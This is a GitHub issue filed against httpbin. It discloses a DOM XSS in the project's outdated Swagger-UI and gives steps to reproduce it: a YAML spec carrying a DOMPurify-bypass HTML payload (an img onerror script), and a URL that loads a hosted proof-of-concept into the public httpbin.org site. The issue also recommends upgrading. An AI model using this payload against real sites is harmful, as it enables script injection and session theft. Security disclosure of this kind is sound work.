search

postmanlabs / httpbin

HTTP Request & Response Service, written in Python + Flask.
https://httpbin.org
ISC License
12.83k stars 1.82k forks source link

DOM XSS due to old SwaggerUI version #681

Open chilikeys opened 2 years ago

chilikeys commented 2 years ago

Hello,

httpbin uses an old version of Swagger-UI under the hood which is vulnerable to DOM XSS by adding a malicious yaml file as value to the query parameter url

Steps To Reproduce:

  1. Host a malicious .yaml file with the payload inside:
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  1. Visit the link https://httpbin.org?url=https://jumpy-floor.surge.sh/test.yaml. Here I use the publically availiable PoC posted on the reference article and the public instance of httpbin for ease. You can test it on another instance you spin up and use a payload you host if you preffer.
  2. Observe the pop-up window.

Supporting Material/References:

This is a bug in older SwaggerUI version that use an older version of DOMPurify to sanitize html. You can read more about it here: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

Impact

Run javascript on the victim's broswer

Mitigation

Upgrade Swagger-UI version to the latest which mitigates this.

A few notes

I sent you an email regarding this and got no reply so I am opening an issue here. Since there is anorher XSS reported 2 years ago or so and you haven't responded to that, I assume you don't care about XSS in general

However, I decided to report this for 2 reasons

  1. It was already fixed by Swagger-UI and using the latest versions of dependencies is Security 101
  2. I am a bug bounty hunter on hackerone.com. Most programs accept 0-day reports no earlier than after 30 days of publication. I've come across some instances of this and I want to report them and since I believe this is a 0-day I wanted to make it public for this reason.

Best Regards,

rhinestonecowboy